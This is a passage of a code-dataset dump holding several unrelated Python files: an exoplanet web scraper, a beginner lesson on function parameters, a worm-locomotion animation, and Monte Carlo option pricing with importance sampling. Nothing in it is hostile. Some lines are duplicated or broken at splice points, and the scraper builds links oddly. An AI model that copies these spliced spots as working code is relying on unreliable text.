current_page_numb=int(soup.find_all(\"input\",attributes={\"class\",\"page_numb\"}).get(\"value\"))\r\n if current_page_numb < i 
 while True :\r\n time.sleep(2)\r\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\r\n current_page_numb=int(soup.find(\"input\", attrs={\"class\": \"page_numb\"}).get(\"value\"))\r\n if current_page_numb < i :\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[2]/a').click()\r\n elif current_page_numb>i:\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[1]/a').click()\r\n else:\r\n break\r\n\r\n for ul_tag in soup.find_all(\"ul\", attrs={\"class\": \"exoplanet\"}):\r\n li_tags = ul_tag.find_all(\"li\")\r\n temp_list = []\r\n for index, li_tag in enumerate(li_tags):\r\n if index == 0:\r\n temp_list.append(li_tag.find_all(\"a\")[0].contents[0])\r\n else:\r\n try:\r\n temp_list.append(li_tag.contents[0])\r\n except:\r\n temp_list.append(\"\")\r\n hyperlink_li_tag=li_tags[0]\r\n temp_list.append(\"https://en.wikipedia.org/wiki/List_of_brown_dwarfs\"+hyperlink_li_tag.find_all(\"a\",href=True)[0][\"href\"])\r\n \r\n planet_data.append(temp_list)\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[2]/a').click()\r\n print(f\"{i} page done1\")\r\ndef scrap_more_data(hyperlink):\r\n try:\r\n page=requests.get(hyperlink)\r\n soup=BeautifulSoup(page.content,\"html.parser\")\r\n for tr_tag in soup.find_all(\"tr\",attrs={\"class\":\"fact_rope\"}):\r\n td_tags=tr_tag.find_all(\"td\")\r\n temp_list=[]\r\n for td_tag in td_tags:\r\n try:\r\n temp_list.append(td_tag.find_all(\"div\",attrs={\"class\": \"value\"})[0].contents[0])\r\n except:\r\n temp_list.append(\"\")\r\n new_planet_data.append(temp_list)\r\n except:\r\n time.sleep(1)\r\n scrap_more_data(hyperlink)\r\n\r\nscrap()\r\nfor index, data in enumerate(planet_data):\r\n scrap_more_data(data[5])\r\n print(f\"{index+1} page done2\")\r\nfinal_planet_data=[]\r\n\r\nfor index,data in enumerate(planet_data):\r\n new_planet_data_element=new_planet_data[index]\r\n new_planet_data_element=[elem.replace(\"\\n\",\"\")for elem in new_planet_data_element]\r\n new_planet_data_element=new_planet_data_element[:7]\r\n final_planet_data.append(data+new_planet_data_element)\r\n\r\nwith open (\"final.csv\",\"w\") as f:\r\n csvwriter=csv.writer(f)\r\n csvwriter.writerow(headers)\r\n csvwriter.writerows(final_planet_data)","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"566715022","text":"# def function_name(parameter_name=default_value):\n# code inside the function\n# a parameter may be given a default value, but it must come after the ordinary parameters\ndef say(msg=\"hello\"):\n print(msg)\nsay(\"hihi\")\nsay() # prints the default value hello\n\n# matching by name (keyword arguments)\n# def function_name(name1, name2):\n# code inside the function\n# # call the function, matching data to parameters by name\n# function_name(name2=3, name1=5)  # if no names are given, arguments must be passed in order\ndef divide(n1, n2):\n result=n1/n2\n print(\"divide: \", result)\ndivide(2, 4)\ndivide(n2=2, n1=4)\n\n# unlimited parameters\n# def function_name(*params)  # a \"*\" before the parameter name marks unlimited parameters\n# the unlimited parameters are handled as a Tuple\n# code inside the function\n# # call the function; any number of arguments may be passed in\n# function_name(data1, data2, data3)\n\n# example\n# the function accepts unlimited parameters msgs\ndef saylimit(*msgs):\n # handled as a Tuple\n for msgg in msgs:\n print(msgg)\nsaylimit(\"hi\", \"hihi\", \"hihihi\")\n\n\n\nprint(\"=====hands-on practice======\")\n# hands-on practice\n# default parameter values and keyword arguments\ndef power(base, exp=0):\n print(base**exp)\npower(3,2)\npower(exp=3, base=2) # keyword arguments\npower(4) # exp defaults to 0, so 4 to the power 0 is 1\n\n# unlimited / variable number of arguments\n# compute an average, but the amount of numbers is not fixed: avg(3,4) avg(3,5,10) avg(1,4,-1,-8)\nprint(\"compute an average, but the amount of numbers is not fixed: avg(3,4) avg(3,5,10) avg(1,4,-1,-8)\")\ndef avg(*num):\n sum = 0\n avgs = 0\n for i in num:\n sum = sum + i\n avgs = sum / len(num)\n print(avgs)\n\navg(3, 4)\navg(3, 5, 10)\navg(1 ,4, -1, -8)\n\n# alternative version\n# def avg(*num):\n# sum = 0\n# for i in num:\n# sum = sum + i\n# print(sum / len(num))\n#\n# avg(3, 4)\n# avg(3, 5, 10)\n# avg(1 ,4, -1, -8)
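\n\n# Added note (not part of the original lesson): parameters with defaults must\n# come after the required ones --\n# def greet(name, msg=\"hi\"):  # valid\n# def greet(msg=\"hi\", name):  # SyntaxError: non-default argument follows default argument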
-8)\n","sub_path":"learn/8_def_adv.py","file_name":"8_def_adv.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379585071","text":"# manducaGraph\n# This function animates a beautiful movie of one or more Manducas racing along.\n# It works from a file that has saved data from a prior simulation run.\n#\n# Inputs:\n#\tmode: -\t0 means display each file as a horizontally-moving worm;\n#\t\tone file (i.e., one worm) per line in the movie. In this\n#\t\tcase, 'arg' is how many seconds the full movie should last and\n#\t\t'varargin' is an alternating list of (the name of a file of\n#\t\tworm data, followed by a label for that worm).\n#\t - 1 means display one worm only, but display it as a sequence\n#\t\tof 'arg' stills, one over the other. In this case, 'varargin'\n#\t\tis the name of exactly one file of worm data.\n#\targ, varargin: as indicated above.\n# A common call might then be\n#\tmanducaGraph (0, 20, 'C:\\users\\johnM\\matlab\\graph1.txt', 'Slow worm',\n#\t\t\t 'C:\\users\\johnM\\matlab\\graph2.txt', 'Fast worm');\n# This would display both worms (one from graph1.txt and one from graph2.txt)\n# racing against each other. The two animated worms would be labeled\n# 'Slow worm' and Fast worm'.\n#\n# Another common call might be\n#\tmanducaGraph (1, 20, 'C:\\users\\johnM\\matlab\\graph1.txt')\n# This would take the worm-motion data from graph1.txt, pull out 20 stills at\n# evenly-spaced times, and display them.\n#\n# The worm-data files are typically produced by manducaFitness(), which can\n# be told to save all simulation data into a file.\n\n# Constants.\nFPS = 30\t\t# frames per second.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.patches as patches\n\ndef manducaGraph (mode, arg, *rest):\n global points\n # Build points[n_frames,15,n_worms]\n # The 2nd dimension is 15: t, 5 x values, 5 leg_locked and 4 muscle_on.\n # The 3rd dimension is always the number of worms to draw one above another.\n # The 1st dimension is the number of frames to time-sequence for each worm.\n if (mode==0):\t\t# video of one or more worms racing.\n # Read the file(s) and build points[n_frames][15 items][n_worms]\n wall_time = int(arg)\n n_frames = 1 + wall_time*FPS\n if (len(rest) & 1 != 0):\n raise Exception ('Missing label name for file')\n\n n_files = len(rest)//2\n labels = [rest[2*f+1] for f in range(n_files)]\n points = np.empty ((n_frames,15,n_files))\n for f in range(n_files):\n points[:,:,f] = read_file (rest[2*f], n_frames)\n elif (mode==1):\t\t# a few stills of one worm.\n # In this mode, we just read one file of data (from one worm).\n # Then we extract 'n_stills' evenly-spaced stills from it to\n # build points[1][15 items][n_stills].\n n_stills = arg\n points = np.empty ((1,15,n_stills))\n pts = read_file (rest[0], n_stills)\n # We now take our N frames, extracted from one worm over time, and\n # pretend that they are 1 frame each from N worms. That will result in\n # a sequence of N stills.\n for st in range(n_stills):\n points[:,:,st] = pts[st,:]\n labels = ['t='+str(100*st/(n_stills-1)) for st in range(n_stills)]\n else:\n raise Exception ('Illegal mode: must be 0 or 1')\n\n # We now have points[n_display_timepoints][15][n_worms]. Run the movie.\n display (points, labels)\n\n# Inputs:\n# -\tfile: a filename. 
The file has one line per simulation timepoint.\n#\tEach line is comma-separated values with the format\n#\ttime, x1,x2,x3,x4,x5, lock1...lock5, musc1...musc5\n# - n_frames: the number of frames to return. So if the file contains data\n#\tfrom t=0 to t=100 and we want to return 3 frames, then we will sample\n#\tevery 50s of simulated time.\n# Return a 2D array where row #i is the simulation data at frame #i.\n# So the first row is for t=0. The last row is for the simulation end time \n# which is always t=100).\n# The returned array has the same number of columns (with the same meaning) as\n# the simulation file.\ndef read_file (file, n_frames):\n print ('Sampling file', file, 'to create',n_frames,'frames.')\n\n # Read the file, starting at the 2nd line (the top line is a comment).\n # Now we have an array where each line is\n #\t(time, x1,x2,x3,x4,x5, lock1...lock5, musc1...musc5)\n with open (file, 'r') as fp:\n lines = fp.readlines() # one list item per line.\n # The top line is just a comment\n del lines[0]\n n_rows = len(lines)\n n_cols = len(lines[0].split(','))\n # Do a double-nested list comprehension to get the data.\n pts_list = [[float(val) for val in line.split(',')] for line in lines]\n raw = np.array (pts_list)\n\n # Sanity check that we have 15 columns.\n assert (raw.shape[1] == 15) # time, x1-5, 5 lock values, 4 muscles.\n # Sanity check that the leg-lock values are all 0 or 1.\n assert ((raw[:,6:11]==0) | (raw[:,6:11]==1)).all()\n # And the muscle values are all 0 or 100.\n assert ((raw[:,11:15]==0) | (raw[:,11:15]==100)).all()\n\n # How often must we sample to get n_frames frames?\n # Note the .00001; we want to ensure that the final value of desired_t below\n # is not actually *bigger* than raw[-1,0]; that would make us skip the last\n # point\n t_final = raw[-1,0] - .00001\n interval = t_final/(n_frames-1)\n\n # Now do the interpolation.\n # Note that the file may occasionally have such small timesteps that,\n # when we print out with finite precision, it seems like two consecutive\n # rows share the same time. The algorithm below is robust to that.\n\n # It should always be true that desired_t = interval * (points_row-1).\n desired_t = 0\t\t# The timepoint we want numbers for.\n points_row = 0\t\t# We will put this row in points(points_row,:).\n\n # The big picture: this loop keeps stepping through 'raw' until desired_t\n # is in [row r.time, row r+1.time]. 
Then it interpolates to find the data at\n # desired_t (and any other desired timepoints that are also in the interval)\n # The first time around the loop, desired_t=0 and the interval really is\n # closed on the left; afterwards, it is always (].\n # At the bottom of this loop, we will always have desired_t > raw[r+1].time,\n # since we will have kept incrementing desired_t until it is out of the\n # interval.\n points = np.empty((n_frames,15))\n for r in range(raw.shape[0]-1):\t# For every row pair (r,r+1)\n time1 = raw[r,0]\t\t# timepoint for this table row\n time2 = raw[r+1,0]\t\t# timepoint for the next table row\n while (desired_t <= time2):\n inter = interpolate(raw,r,desired_t)\n points[points_row,:] = interpolate(raw,r,desired_t)\n desired_t += interval\n points_row += 1\n return (points)\n\n# Given:\n#\t- raw: an array of (time, x1,x2,x3,x4,x5,lock1...lock5) for all\n#\t timepoints that were integration timesteps.\n#\t- t: the timepoint we really want.\n#\t- r: says where to find t=next_interval in 'raw'.\n# Assume that the desired time 't' obeys raw(r,1)<= t <= raw(r+1,1).\n# Perform linear interpolation based on that time and return a full 15-element\n# row vector where:\n#\t- [0] is the desired time 't'\n#\t- [1:5] are the interpolated 'x' positions of the five body segments.\n#\t- [6:10] are the lock conditions from raw(r,6:10)\n#\t- [11:14] are the muscles from raw(r,11:14).\ndef interpolate (raw,r,t):\n ###print ('Interpolating row',r,'and',r+1,'for time=',t)\n assert ((raw[r,0]<=t) & (raw[r+1,0]>=t))\n frac = (t-raw[r,0])/(raw[r+1,0]-raw[r,0])\n # Interpolate the X values (1:5). Also interpolate time as a sanity check.\n points = np.empty((15))\n points[0:6] = raw[r,0:6] + frac*(raw[r+1,0:6]-raw[r,0:6])\n assert (abs (points[0]-t) < .0001)\n\n # The leg-lock values just get dragged along.\n points[6:15] = raw[r,6:15]\t\t# Leg-lock values & muscles.\n\n # Very occasionally, the Matlab ODE solver will squish the worm so much that\n # a front leg gets pushed behind a back leg! Fix that here -- we really\n # should fix the ODEs instead :-(, but I've not gotten around to debugging\n # it.\n for i in range (2,6):\n points[i] = max (points[i-1],points[i])\n return (points)\n\n############################################################\n# The rest of the file is for window display\n############################################################\n\n# Set up the plot window.\n# We create axes, scaled so that:\n#\t* x ranges over the min/max x values from the simulation.\n#\t* y ranges from 0 to n_worms; i.e., each worm is allocated a vertical\n#\t space of 1.\ndef display (points, labels):\n n_worms = points.shape[2]\n print ('making',n_worms,'worms')\n\n # Get min & max value in 'points'. Make sure to only min/max over the X\n # values (i.e., columns 1:5), not the leg-locks & muscles.\n x_min = np.min(points[:,1:6,:])\n x_max = np.max(points[:,1:6,:])\n\n # Set up the figure and its axes.\n fig,axes = plt.subplots()\n axes.axis ([x_min,x_max,0,n_worms])\n axes.set_autoscale_on(False)\n # print ('x limits=', axes.get_xlim(), ', y limits=', axes.get_ylim())\n\n draw_labels (labels, axes)\t\t# Label each worm with text on the left\n init_pats(n_worms, axes)\t\t# Create all of the moving shapes\n\n msecPerFrame = 1000/FPS\n ani = animation.FuncAnimation(fig, per_frame, frames=points.shape[0],\n interval=msecPerFrame, blit=True,\n repeat=False)\n print (\"Finished animation\")\n plt.show()\n\n# Create all of the rectangles that make up the legs and body segments for all\n# of the worms. 
Just put them anywhere at all; per_frame() will move them.\n# Each worm has:\n# - 5 legs. A leg is a single vertical rectangle.\n# - 4 body segments. Each one is a horizontal rectangle (perhaps with a bit of\n# curvature), as well as a horizontal line in it if the segment's muscle is on\n# We keep all of these objects in\n# - Legs[5][n_worms]\n# - BodySegs[4][2][n_worms]. For this, [*][0][*] is the main-segment rectangle,\n# and [*][1][*] is the corresponding muscle-on band.\ndef init_pats(n_worms, axes):\n global legs, bodySegs, allPatches\n legs = np.empty ((5, n_worms), dtype=object)\n bodySegs = np.empty ((4, 2, n_worms), dtype=object)\n\n for w in range(n_worms):\n for l in range(5):\t# Build the red legs\n pat = patches.Rectangle ((0,0),.1,.1, facecolor='r')\n axes.add_patch (pat)\n legs[l][w] = pat\n\n for bs in range(4):\n pat = patches.Rectangle ((0,0),.1,.1, facecolor='g')\n axes.add_patch (pat)\t# Green body segments\n bodySegs[bs][0][w] = pat\n pat = patches.Rectangle ((0,0),.1,.1, facecolor='k')\n axes.add_patch (pat)\t# Black muscle-on bands\n bodySegs[bs][1][w] = pat\n\n # Collect up all of the rectangles into one big list, so that per_frame()\n # can return the list.\n allPatches = [legs[l][w] for l in range(5) for w in range(n_worms)]\n bs = [bodySegs[bs][0][w] for bs in range(4) for w in range(n_worms)]\n m = [bodySegs[bs][1][w] for bs in range(4) for w in range(n_worms)]\n allPatches.extend (bs)\n allPatches.extend (m)\n\n# The per-frame animation function.\n# Inputs: 'points' is a full array with[n_timepoints][data][n_worms] (where\n#\tn_timepoints is the number of frames to be displayed).\n# Remember that our display axes are:\n#\t* x ranges over the min/max x values from the simulation.\n#\t* y ranges from 0 to n_worms; i.e., each worm is allocated a vertical\n#\t space of 1.\ndef per_frame (f):\n global legs, bodySegs, points, allPatches\n for y in range(legs.shape[1]):\t# For each worm (& draw worm #i at y=i)\n # Make a slice with just this frame & worm. It has [0:5]=legX,\n # [6:10]=legLocked, [10:14]=muscle\n pts = points[f,1:,y]\n leg_width=30\n for l in range(5):\n legX = pts[l]; lock=pts[l+5]\n # A leg is 'width' wide, centered at 'x'.\n # Its top is at y+.5; it drops down to y+(lock?.3:.4).\n x_l = legX-leg_width/2\n y_b = y + (.4 - lock/10)\n legs[l][y].set_bounds (x_l,y_b, leg_width, y+.5-y_b)\n\n for bs in range(4):\n x1 = pts[bs]; x2=pts[bs+1]; musc=pts[bs+10]\n # Draw the segment from x1+(leg_width/2) to x2-(leg_width/2).\n # However, it may be that x2-x1 <= leg_width, in which case the body\n # part would vanish -- in that case, we pretend that leg is skinnier\n if (x1 + leg_width >= x2):\n leg_width = (x2-x1)/4\n\n # The height goes from y=.7 to y=.5.\n # So the LL is (x1+(leg_width/2),.5).\n LL_x = x1+(leg_width/2)\n dx = x2-(leg_width/2) - LL_x\n bodySegs[bs][0][y].set_bounds (LL_x,.5+y, dx,.2)\n\n # If the muscle is on, draw a black band across the segment.\n bodySegs[bs][1][y].set_visible (musc==100)\n bodySegs[bs][1][y].set_bounds (LL_x,.58+y, dx,.04)\n\n # We must return a list of everything that's moving this frame. 
Just assume\n # that everything moves (which it mostly does), and thus return the same\n # list of all rectangles all the time.\n return allPatches\n\n# Draw the names of the worm(s), on the left side of the screen.\ndef draw_labels (labels, axes):\n L = len(labels)\n for i,label in enumerate(labels):\n y = (i+.5)\n axes.text (.05,y,label)\n\n# Actually run the program.\n# manducaGraph (0, 30, 'crawl6_final_output.txt', 'worm@20')","sub_path":"5_ManducaModel/manducaGraph.py","file_name":"manducaGraph.py","file_ext":"py","file_size_in_byte":13418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384535754","text":"import math\nimport numpy as np\nfrom scipy import special, integrate, optimize\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm as gauss\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom numpy import sqrt, pi, exp, log\nfrom scipy.linalg import norm\n\n# import mpmath as mp\n# from mpmath import sqrt, exp, log, pi, norm\n\nfrom blackscholes import *\n\n# Robbins-Monro (RM) iterations\nM = 500\n# Monte Carlo (MC) iterations\nN = 500000\n\ns0 = 100\nT = 1\nr = 0.05\nsigma = 0.2\n# strike price\nK = 1.4*s0\n# s0 = 1\n# T = 1\n# r = 0\n# sigma = 1\n\nBS = BlackScholes(s0, r, sigma, T)\n\n\ndef F(x):\n e = exp(x) - K\n if e > 0:\n return 50 * e\n else:\n return 0\n\ndef H(theta, x):\n xi = (sqrt(10) - 2) / 3 * theta\n if x < log(K) - xi:\n return 0\n # a = (theta - xi - x) * exp(-(x+xi)**2 + 0.5*(x+xi-theta)**2 + 0.5*x**2 - 0.25*(x-xi)**2 - 100*norm(theta))\n # return F(x+xi)**2*a\n a = (theta - xi - x) * exp(-1/4*x**2 - (2/3 + sqrt(10)/6)*x*theta + 2*x + (2*sqrt(10)/3 - 4/3)*theta)\n return a\n\ndef Hexpl(theta, x):\n return F(x)**2 * (theta - x) * exp(-0.75*x**2 + 0.5*(x-theta)**2 - 0.5*theta**2 - norm(theta))\n\ndef RM(theta, x):\n if x < log(K):\n return 0\n # a1 = (theta - x)*exp(-0.5*x**2 + 0.5*(x-theta)**2 - (3/2+1)*norm(theta)**2)\n a1 = (theta - x)*exp(-0.5*x**2 + 0.5*(x-theta)**2)\n # print(a1)\n if a1 == 0:\n print('NULL!!')\n return 0\n elif a1 < 0:\n a = sqrt(-a1)\n return -(50*(exp(x + log(a)) - K*a))**2\n else:\n a = sqrt(a1)\n return (50*(exp(x + log(a)) - K*a))**2\n\ndef RMput(theta, x):\n # if x > log(K):\n # return 0\n # a1 = (theta - x)*exp(-x**2 + 0.5*(x-theta)**2 - 0.5*norm(theta)**2)\n a1 = (theta - x)*exp(-0.5*x**2 - theta*x - 100*norm(theta))\n if a1 == 0:\n return 0\n elif a1 < 0:\n a = sqrt(-a1)\n return -(50*(exp(x + log(a))))**2\n else:\n a = sqrt(a1)\n return (50*(exp(x + log(a))))**2\n\ndef RMminus(theta, x):\n if x < log(K) + theta:\n return 0\n return (50*(exp(x - theta) - K))**2 * (2*theta - x) * exp(-2*norm(theta))\n # print(a1)\n # if a1 == 0:\n # print('NULL!!')\n # return 0\n # elif a1 < 0:\n # a = sqrt(-a1)\n # return -(50*(exp(x + log(a)) - K*a))**2\n # else:\n # a = sqrt(a1)\n # return (50*(exp(x + log(a)) - K*a))**2\n\ndef RMArouna(theta, x):\n if x < log(K):\n return 0\n # return (50*(exp(x)-K))**2 * (theta - x) * exp(-theta*x + 0.5*norm(theta)**2)\n return (50*(exp(x)-K))**2 * (theta - x) * exp(-theta*x)\n\ndef RMArounaplus(theta, x):\n if x < log(K) - theta:\n return 0\n return (50*(exp(x+theta)-K))**2 * -x * exp(-2*theta*x - norm(theta)**2)\n\n\ndef RMp(theta, x):\n if x < log(K):\n return 0\n # a1 = (theta - x)*exp(-x**2 + 0.5*(x-theta)**2 - 0.5*norm(theta)**2)\n a1 = (theta - x)*exp(-0.5*x**2 - theta*x - norm(theta))\n if a1 == 0:\n return 0\n elif a1 < 0:\n a = sqrt(-a1)\n return -(50*(exp(x + log(a)) - K*a))**2\n else:\n a = sqrt(a1)\n return (50*(exp(x + log(a)) - 
K*a))**2\n\ndef esscher():\n    # TODO: Esscher-transform variant; left as an unimplemented stub.\n    theta = 0\n    for n in range(M):\n        pass\n\ndef rhoCall(theta):\n    return exp(-2*sigma*sqrt(T)*abs(theta))\n\ndef FCall(x, K):\n    e = s0*exp(sigma*sqrt(T)*x + (r-0.5*sigma**2)*T) - K\n    if e > 0:\n        return exp(-r*T) * e\n    else:\n        return 0\n\ndef rhoPut(theta):\n    return 1\n\ndef FPut(x):\n    e = K - s0*exp(sigma*sqrt(T)*x + (r-0.5*sigma**2)*T)\n    if e > 0:\n        return exp(-r*T) * e\n    else:\n        return 0\n\ndef adaptiv(rho, F):\n    C1 = 1\n    C2 = 10 * s0**2\n    theta = 0\n    for n in range(1, M+1):\n        X = np.random.normal()\n        theta = theta - C1/(C2 + n) * rho(theta) * F(X-theta)**2 * (2*theta-X)\n\n    thetaM = theta\n    print('thetaM = ', thetaM)\n\n    mu = 0\n    gSqSum = 0\n    for n in range(1, N+1):\n        X = np.random.normal()\n        g = F(X+theta)*exp(-theta*X - 0.5 * theta**2)\n        mu = mu - 1/n * (mu - g)\n        theta = theta - C1/(C2 + M + n) * rho(theta) * F(X-theta)**2 * (2*theta-X)\n        gSqSum = gSqSum - 1/n * (gSqSum - g**2)\t# update the running second moment once per sample\n        varest = gSqSum - mu**2\n\n        if n % 100000 == 0 or n == N:\n            print('theta = ', theta, 'mu = ', mu, 'varest = ', varest)\n\n    return thetaM, theta, mu, varest\n\ndef crude(F):\n    mu = 0\n    gSqSum = 0\n    for n in range(1, N+1):\n        X = np.random.normal()\n        g = F(X)\n        mu = mu - 1/n * (mu - g)\n        gSqSum = gSqSum - 1/n * (gSqSum - g**2)\n        varest = gSqSum - mu**2\n        if n % 100000 == 0 or n == N:\n            print('mu = ', mu, 'varest = ', varest)\n\n\n\n\n# importance sampling by mean translation\ndef translation():\n    # optimize theta by RM\n    # theta = log(K)\n    # theta = 6.22\n    # theta = 0.82\n    theta = 0\n    for n in range(M):\n        X = np.random.normal()\n        thetaold = theta\n\n        # theta -= 1 / 30000 / (n+1) * RM(theta, X)\n        theta -= 1 / (n+1) * RMArouna(theta, X)\n        # theta -= 1 / 0.121 / (n+1) * H2(theta, X)\n        # theta -= 1 / 4500 / (n+1) * RMminus(theta, X)\n        if norm(theta) > sqrt(n):\n            print('le le le le Chen!!', theta)\n            if n % 2:\n                theta = 0.5\n            else:\n                theta = -0.5\n\n\n        if theta != thetaold:\n            print(str(thetaold) + ' -> ' + str(theta))\n        if n % 1000 == 0:\n            print(n, theta)\n    input()\t# pause so the RM trace can be inspected before the MC run\n    # run MC with optimized theta\n    res = np.zeros(N)\n    for n in range(N):\n        X = np.random.normal()\n        res[n] = F(X + theta) * exp(-theta*X - 0.5*theta**2)\n        if n % 1000 == 0:\n            print(n, np.mean(res[:n+1]), np.var(res[:n+1]))\n\n# NOTE: Kprime is expected to come from the wildcard 'blackscholes' import\n# above; it is not defined anywhere in this file.\ndiscCall = 0\ndiscPut = 0\ndef call(x):\n    global discCall\n    e = s0 * exp(-0.5*sigma**2 * T + sigma * x)\n    if e > Kprime:\n        return e - Kprime\n    else:\n        discCall += 1\n        return 0\n\ndef put(x):\n    global discPut\n    e = s0 * exp(-0.5*sigma**2 * T + sigma * x)\n    if e < Kprime:\n        return Kprime - e\n    else:\n        discPut += 1\n        return 0\n\ndef MC():\n    resCall = np.zeros(N)\n    resPut = np.zeros(N)\n    for n in range(N):\n        X = np.random.normal(0, sqrt(T))\n        resCall[n] = call(X)\n        resPut[n] = put(X)\n        if n % 1000 == 0:\n            mput = np.mean(resPut[:n+1])\n            print(n, np.mean(resCall[:n+1]), np.var(resCall[:n+1]), mput, np.var(resPut[:n+1]), s0 - Kprime + mput, discCall, discPut)\n    print(exactCall(), exactCallVar(), exactPut(), exactPutVar())\n\ndef plotCallPutPrices():\n    plt.figure()\n    plt.title('Prices of call and put for different strikes')\n    Ks = np.linspace(0.5, 1.5)\n    call = [BS.exactCallPrice(K) for K in Ks]\n    put = [BS.exactPutPrice(K) for K in Ks]\n    plt.plot(Ks, call, label='call')\n    plt.plot(Ks, put, label='put')\n    plt.xlabel('strike')\n    plt.ylabel('price')\n    plt.legend()\n\ndef plotCallPutVar():\n    plt.figure()\n    plt.title('Exact variance of call and put for different strikes')\n    Ks = np.linspace(0.5, 1.5)\n    callvar = [BS.exactCallVar(K) for K in
Ks]\n putvar = [BS.exactPutVar(K) for K in Ks]\n plt.plot(Ks, callvar, 'b', label='call')\n plt.plot(Ks, putvar, 'g', label='put')\n # call2 = [BS.callSquared(K) for K in Ks]\n # put2 = [BS.putSquared(K) for K in Ks]\n # plt.plot(Ks, call2, 'r', label='call2')\n # plt.plot(Ks, put2, 'k', label='put2')\n plt.xlabel('strike')\n plt.ylabel('variance')\n plt.legend()\n\ndef plotISVar():\n plt.figure()\n plt.title('Variance optimization problem (call)')\n for K in [0.6, 0.8, 1.0, 1.2, 1.4]:\n theta = np.linspace(-0.3, 1.6)\n var = [BS.exactCallVar(K, theta) for theta in theta]\n minth = theta[np.argmin(var)]\n line, = plt.plot(theta, var, label=str(K))\n plt.axvline(minth, color=line.get_color())\n\n plt.xlabel(r'$\\theta$')\n plt.ylabel('call variance')\n plt.legend(title='strike', loc='upper left')\n plt.autoscale(tight=True)\n\n plt.figure()\n plt.title('Variance optimization problem (put)')\n for K in [0.6, 0.8, 1.0, 1.2, 1.4]:\n theta = np.linspace(-1.6, 0.0)\n var = [BS.exactPutVar(K, theta) for theta in theta]\n minth = theta[np.argmin(var)]\n line, = plt.plot(theta, var, label=str(K))\n plt.axvline(minth, color=line.get_color())\n\n plt.xlabel(r'$\\theta$')\n plt.ylabel('put variance')\n plt.legend(title='strike', loc='upper left')\n plt.autoscale(tight=True)\n\ndef plotOptimalTheta():\n plt.figure()\n plt.title(r'Optimal $\\theta$ for different strikes')\n Ks = np.linspace(0.5, 1.5)\n optth = [optimize.brentq(lambda th: BS.callSquaredDeriv(s0*K, th), -5, 5) for K in Ks]\n plt.xlabel(r'$K/s_0$')\n plt.ylabel(r'$\\theta_{opt}$')\n plt.plot(Ks, optth)\n\ndef plot3DISVars():\n @np.vectorize\n def getVar(K, theta):\n return BS.exactCallVar(K, theta)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n K = np.linspace(0.6, 1.4)\n theta = np.linspace(0.3, 1.8)\n # K = np.linspace(0.0, 1.4)\n # theta = np.linspace(-3, 3)\n Km, thetam = np.meshgrid(K, theta)\n z = getVar(Km, thetam)\n minth = []\n minvar = []\n for i in range(len(K)):\n minvar.append(np.min(z[:,i]))\n minth.append(theta[np.argmin(z[:,i])])\n ax.plot(K, minth, minvar, 'r')\n ax.plot_surface(Km, thetam, z, cmap=plt.cm.jet, rstride=1, cstride=1, vmax=0.5)\n ax.set_xlabel('strike')\n ax.set_ylabel(r'$\\theta$')\n\ndef plotVarRM():\n plt.figure()\n plt.title('Call second moment and derivative')\n theta = np.linspace(0.4, 1.0)\n var = [BS.callSquared(K, theta) for theta in theta]\n deriv = [exp(-norm(theta)**2)*BS.callSquaredDeriv(K, theta) for theta in theta]\n plt.plot(theta, var, label='variance')\n plt.plot(theta, deriv, label='derivative')\n plt.xlabel(r'$\\theta$')\n plt.legend()\n\ndef plotISCall():\n x = np.linspace(-10, 10)\n y = 1/sqrt(2*pi*T)*exp(-x**2/(2*T))*(s0*exp(-0.5*sigma**2*T + sigma*sqrt(T)*x)-K*exp(-r*T))\n plt.plot(x, y)\n\ndef testExactVar():\n for K in np.linspace(0.6, 1.4, 5):\n for theta in np.linspace(0.0, 1.6, 5):\n print(K, theta)\n numIntC = integrate.quad(lambda x: BS.callISVar(K*s0, theta, x), -np.infty, np.infty)[0]\n numIntP = integrate.quad(lambda x: BS.putISVar(K*s0, theta, x), -np.infty, np.infty)[0]\n exactC = BS.callSquared(K*s0, theta)\n exactP = BS.putSquared(K*s0, theta)\n print(numIntC, exactC, np.abs(numIntC - exactC) / exactC)\n print(numIntP, exactP, np.abs(numIntP - exactP) / exactP)\n\ndef testCallSquaredDeriv():\n for K in np.linspace(0.6, 1.4, 5):\n for theta in np.linspace(0.0, 1.6, 5):\n print(K, theta)\n numIntC = integrate.quad(lambda x: BS.RM(K, theta, x), -np.infty, np.infty)[0]\n epsilon = 1e-10\n numDerivC = (BS.callSquared(K, theta+epsilon)-BS.callSquared(K, 
theta-epsilon))/2/epsilon\n exactC = BS.callSquaredDeriv(K, theta)\n print(numIntC, numDerivC, exactC, np.abs(numIntC - exactC) / exactC)\n\ndef testVarEquiv():\n for K in np.linspace(0.6, 1.4, 5):\n for theta in np.linspace(0.0, 1.6, 5):\n numIntC = integrate.quad(lambda x: BS.callISVar(K, 0, x), -np.infty, np.infty)[0]\n print(K, theta, BS.callSquared(K, theta), numIntC, exp(2*theta)*BS.callSquared(K/exp(theta), 0))\n\n\n\ndef main():\n fl = open('adaptiv_call.dat', 'w')\n fl.write('Knorm, exact, mu, thopt, thend, thM, exactvar, varest, vratio\\n')\n for K in [0.4, 0.7, 1.0, 1.2, 1.4]:\n thetaM, thetaend, mu, varest = adaptiv(rhoCall, lambda x: FCall(x, K*s0))\n exakt = BS.exactCallPrice(K*s0)\n exvar = BS.callSquared(K*s0)-exakt**2\n thopt = optimize.brentq(lambda th: BS.callSquaredDeriv(K*s0, th), -5, 5)\n fl.write(str(K) + ', ' + str(exakt) + ', ' + str(mu) + ', ' + str(thopt) + ', ' + str(thetaend) + ', ' + str(thetaM) + ', ' + str(exvar) + ', ' + str(varest) + ', ' + str(exvar/varest) + '\\n')\n\n # 